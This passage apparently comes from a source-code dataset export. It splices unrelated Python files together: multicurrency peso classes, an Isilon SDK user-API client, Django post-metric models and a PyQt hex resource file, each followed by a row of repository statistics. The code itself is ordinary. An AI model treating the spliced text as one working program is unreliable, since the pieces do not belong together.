$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'DominicanPeso':
"""Class creator.
Returns:
DominicanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='DOP',
numeric_code='214',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='DO$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class MexicanPeso(Currency):
"""Mexican Peso currency representation.
Simple usage example:
>>> from multicurrency import MexicanPeso
>>> mexican_peso = MexicanPeso(
... amount=123456.789)
>>> print(mexican_peso)
$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'MexicanPeso':
"""Class creator.
Returns:
MexicanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='MXN',
numeric_code='484',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MX$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class PhilippinePeso(Currency):
"""Philippine Peso currency representation.
Simple usage example:
>>> from multicurrency import PhilippinePeso
>>> philippine_peso = PhilippinePeso(
... amount=123456.789)
>>> print(philippine_peso)
₱123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'PhilippinePeso':
"""Class creator.
Returns:
PhilippinePeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='PHP',
numeric_code='608',
symbol='₱',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₱',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class PesoUruguayo(Currency):
"""Peso Uruguayo currency representation.
Simple usage example:
>>> from multicurrency import PesoUruguayo
>>> peso_uruguayo = PesoUruguayo(
... amount=123456.789)
>>> print(peso_uruguayo)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
    def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'PesoUruguayo':
"""Class creator.
Returns:
            PesoUruguayo: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='UYU',
numeric_code='858',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='UY$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 36.080827 | 77 | 0.594217 | 1,873 | 19,195 | 5.916177 | 0.074212 | 0.050537 | 0.034654 | 0.027434 | 0.865806 | 0.865806 | 0.865806 | 0.865806 | 0.860121 | 0.817796 | 0 | 0.01573 | 0.311123 | 19,195 | 531 | 78 | 36.148776 | 0.822052 | 0.50112 | 0 | 0.801762 | 0 | 0 | 0.024373 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035242 | false | 0 | 0.013216 | 0 | 0.154185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c13ccb223f7b1a78fa9171827d05e1d5f58a1f4 | 20,275 | py | Python | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_9_0_0.api_client import ApiClient
class AuthUsersApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user_member_of_item(self, user_member_of_item, user, **kwargs): # noqa: E501
"""create_user_member_of_item # noqa: E501
Add the user to a group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_member_of_item(user_member_of_item, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AuthAccessAccessItemFileGroup user_member_of_item: (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_user_member_of_item_with_http_info(user_member_of_item, user, **kwargs) # noqa: E501
else:
(data) = self.create_user_member_of_item_with_http_info(user_member_of_item, user, **kwargs) # noqa: E501
return data
def create_user_member_of_item_with_http_info(self, user_member_of_item, user, **kwargs): # noqa: E501
"""create_user_member_of_item # noqa: E501
Add the user to a group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_member_of_item_with_http_info(user_member_of_item, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AuthAccessAccessItemFileGroup user_member_of_item: (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_member_of_item', 'user', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user_member_of_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_member_of_item' is set
if ('user_member_of_item' not in params or
params['user_member_of_item'] is None):
raise ValueError("Missing the required parameter `user_member_of_item` when calling `create_user_member_of_item`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `create_user_member_of_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_member_of_item' in params:
body_params = params['user_member_of_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user_member_of_member_of(self, user_member_of_member_of, user, **kwargs): # noqa: E501
"""delete_user_member_of_member_of # noqa: E501
Remove the user from the group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_member_of_member_of(user_member_of_member_of, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_member_of_member_of: Remove the user from the group. (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, **kwargs) # noqa: E501
else:
(data) = self.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, **kwargs) # noqa: E501
return data
def delete_user_member_of_member_of_with_http_info(self, user_member_of_member_of, user, **kwargs): # noqa: E501
"""delete_user_member_of_member_of # noqa: E501
Remove the user from the group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_member_of_member_of: Remove the user from the group. (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_member_of_member_of', 'user', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user_member_of_member_of" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_member_of_member_of' is set
if ('user_member_of_member_of' not in params or
params['user_member_of_member_of'] is None):
raise ValueError("Missing the required parameter `user_member_of_member_of` when calling `delete_user_member_of_member_of`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `delete_user_member_of_member_of`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_member_of_member_of' in params:
path_params['UserMemberOfMemberOf'] = params['user_member_of_member_of'] # noqa: E501
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of/{UserMemberOfMemberOf}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_user_member_of(self, user, **kwargs): # noqa: E501
"""list_user_member_of # noqa: E501
List all groups the user is a member of. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_member_of(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: (required)
:param bool resolve_names: Resolve names of personas.
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: UserMemberOf
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_user_member_of_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.list_user_member_of_with_http_info(user, **kwargs) # noqa: E501
return data
def list_user_member_of_with_http_info(self, user, **kwargs): # noqa: E501
"""list_user_member_of # noqa: E501
List all groups the user is a member of. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_member_of_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: (required)
:param bool resolve_names: Resolve names of personas.
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: UserMemberOf
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user', 'resolve_names', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_member_of" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `list_user_member_of`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'resolve_names' in params:
query_params.append(('resolve_names', params['resolve_names'])) # noqa: E501
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserMemberOf', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user_change_password(self, user_change_password, user, **kwargs): # noqa: E501
"""update_user_change_password # noqa: E501
Change the user's password. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_change_password(user_change_password, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserChangePassword user_change_password: (required)
:param str user: (required)
:param str zone: Specifies access zone containing user.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_user_change_password_with_http_info(user_change_password, user, **kwargs) # noqa: E501
else:
(data) = self.update_user_change_password_with_http_info(user_change_password, user, **kwargs) # noqa: E501
return data
def update_user_change_password_with_http_info(self, user_change_password, user, **kwargs): # noqa: E501
"""update_user_change_password # noqa: E501
Change the user's password. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_change_password_with_http_info(user_change_password, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserChangePassword user_change_password: (required)
:param str user: (required)
:param str zone: Specifies access zone containing user.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_change_password', 'user', 'zone'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user_change_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_change_password' is set
if ('user_change_password' not in params or
params['user_change_password'] is None):
raise ValueError("Missing the required parameter `user_change_password` when calling `update_user_change_password`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `update_user_change_password`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_change_password' in params:
body_params = params['user_change_password']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/change-password', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.632444 | 150 | 0.625499 | 2,446 | 20,275 | 4.901472 | 0.072772 | 0.062057 | 0.06506 | 0.034698 | 0.938527 | 0.928268 | 0.908082 | 0.884227 | 0.868963 | 0.856869 | 0 | 0.01694 | 0.283748 | 20,275 | 486 | 151 | 41.718107 | 0.808635 | 0.332182 | 0 | 0.75 | 1 | 0 | 0.215779 | 0.073929 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035156 | false | 0.050781 | 0.015625 | 0 | 0.101563 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
1c207c882b329dc261224eab7ca0fdf770815197 | 1,489 | py | Python | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.encoding import python_2_unicode_compatible
# Create your models here.
@python_2_unicode_compatible
class Stoyo(models.Model):
datepub = models.DateField(max_length=30)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField()
comments = models.IntegerField()
shares = models.IntegerField()
views = models.IntegerField()
def __str__(self):
return "Stoyo: {}".format(self.link)
#@python_2_unicode_compatible
class Publisher(models.Model):
datepub = models.DateField(max_length=30, null=True)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField(null=True)
comments = models.IntegerField(null=True)
shares = models.IntegerField(null=True)
views = models.IntegerField(null=True)
update = models.DateTimeField(null=True)
class Temporary(models.Model):
datepub = models.DateField(max_length=30, null=True)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField(null=True)
comments = models.IntegerField(null=True)
shares = models.IntegerField(null=True)
views = models.IntegerField(null=True)
update = models.DateTimeField(null=True)
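# A minimal usage sketch for the models above (assumption: this runs inside a
# configured Django project, e.g. via `python manage.py shell`; the concrete
# field values are hypothetical):
#
#     from datetime import date
#     from home.models import Publisher
#
#     post = Publisher.objects.create(
#         datepub=date.today(),
#         page_name='ExamplePage',
#         title='Example title',
#         link='https://example.com/post/1',  # `link` is unique; reusing it raises IntegrityError
#         reactions=10, comments=2, shares=1, views=100,
#     )
#     most_viewed = Publisher.objects.order_by('-views').first()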
| 35.452381 | 61 | 0.770987 | 193 | 1,489 | 5.803109 | 0.233161 | 0.096429 | 0.144643 | 0.192857 | 0.791964 | 0.740179 | 0.740179 | 0.740179 | 0.700893 | 0.700893 | 0 | 0.027356 | 0.116185 | 1,489 | 41 | 62 | 36.317073 | 0.823708 | 0.034923 | 0 | 0.617647 | 0 | 0 | 0.006276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0.029412 | 0.970588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
1c61f9ec69c569f1415067b1f6256687483ed817 | 13,036 | py | Python | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | null | null | null | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | null | null | null | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | 1 | 2020-02-14T21:43:29.000Z | 2020-02-14T21:43:29.000Z | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.8.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x0a\xac\
\x2f\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x2a\x2a\x0a\
\x2a\x2a\x20\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x43\x29\
\x20\x32\x30\x31\x33\x20\x44\x69\x67\x69\x61\x20\x50\x6c\x63\x20\
\x61\x6e\x64\x2f\x6f\x72\x20\x69\x74\x73\x20\x73\x75\x62\x73\x69\
\x64\x69\x61\x72\x79\x28\x2d\x69\x65\x73\x29\x2e\x0a\x2a\x2a\x20\
\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\
\x77\x77\x77\x2e\x71\x74\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\
\x72\x67\x2f\x6c\x65\x67\x61\x6c\x0a\x2a\x2a\x0a\x2a\x2a\x20\x54\
\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x70\x61\x72\x74\
\x20\x6f\x66\x20\x74\x68\x65\x20\x64\x65\x6d\x6f\x6e\x73\x74\x72\
\x61\x74\x69\x6f\x6e\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\
\x6e\x73\x20\x6f\x66\x20\x74\x68\x65\x20\x51\x74\x20\x54\x6f\x6f\
\x6c\x6b\x69\x74\x2e\x0a\x2a\x2a\x0a\x2a\x2a\x20\x24\x51\x54\x5f\
\x42\x45\x47\x49\x4e\x5f\x4c\x49\x43\x45\x4e\x53\x45\x3a\x4c\x47\
\x50\x4c\x24\x0a\x2a\x2a\x20\x43\x6f\x6d\x6d\x65\x72\x63\x69\x61\
\x6c\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\x67\x65\x0a\
\x2a\x2a\x20\x4c\x69\x63\x65\x6e\x73\x65\x65\x73\x20\x68\x6f\x6c\
\x64\x69\x6e\x67\x20\x76\x61\x6c\x69\x64\x20\x63\x6f\x6d\x6d\x65\
\x72\x63\x69\x61\x6c\x20\x51\x74\x20\x6c\x69\x63\x65\x6e\x73\x65\
\x73\x20\x6d\x61\x79\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x66\
\x69\x6c\x65\x20\x69\x6e\x0a\x2a\x2a\x20\x61\x63\x63\x6f\x72\x64\
\x61\x6e\x63\x65\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x63\x6f\
\x6d\x6d\x65\x72\x63\x69\x61\x6c\x20\x6c\x69\x63\x65\x6e\x73\x65\
\x20\x61\x67\x72\x65\x65\x6d\x65\x6e\x74\x20\x70\x72\x6f\x76\x69\
\x64\x65\x64\x20\x77\x69\x74\x68\x20\x74\x68\x65\x0a\x2a\x2a\x20\
\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6f\x72\x2c\x20\x61\x6c\x74\
\x65\x72\x6e\x61\x74\x69\x76\x65\x6c\x79\x2c\x20\x69\x6e\x20\x61\
\x63\x63\x6f\x72\x64\x61\x6e\x63\x65\x20\x77\x69\x74\x68\x20\x74\
\x68\x65\x20\x74\x65\x72\x6d\x73\x20\x63\x6f\x6e\x74\x61\x69\x6e\
\x65\x64\x20\x69\x6e\x0a\x2a\x2a\x20\x61\x20\x77\x72\x69\x74\x74\
\x65\x6e\x20\x61\x67\x72\x65\x65\x6d\x65\x6e\x74\x20\x62\x65\x74\
\x77\x65\x65\x6e\x20\x79\x6f\x75\x20\x61\x6e\x64\x20\x44\x69\x67\
\x69\x61\x2e\x20\x20\x46\x6f\x72\x20\x6c\x69\x63\x65\x6e\x73\x69\
\x6e\x67\x20\x74\x65\x72\x6d\x73\x20\x61\x6e\x64\x0a\x2a\x2a\x20\
\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x73\x65\x65\x20\x68\
\x74\x74\x70\x3a\x2f\x2f\x71\x74\x2e\x64\x69\x67\x69\x61\x2e\x63\
\x6f\x6d\x2f\x6c\x69\x63\x65\x6e\x73\x69\x6e\x67\x2e\x20\x20\x46\
\x6f\x72\x20\x66\x75\x72\x74\x68\x65\x72\x20\x69\x6e\x66\x6f\x72\
\x6d\x61\x74\x69\x6f\x6e\x0a\x2a\x2a\x20\x75\x73\x65\x20\x74\x68\
\x65\x20\x63\x6f\x6e\x74\x61\x63\x74\x20\x66\x6f\x72\x6d\x20\x61\
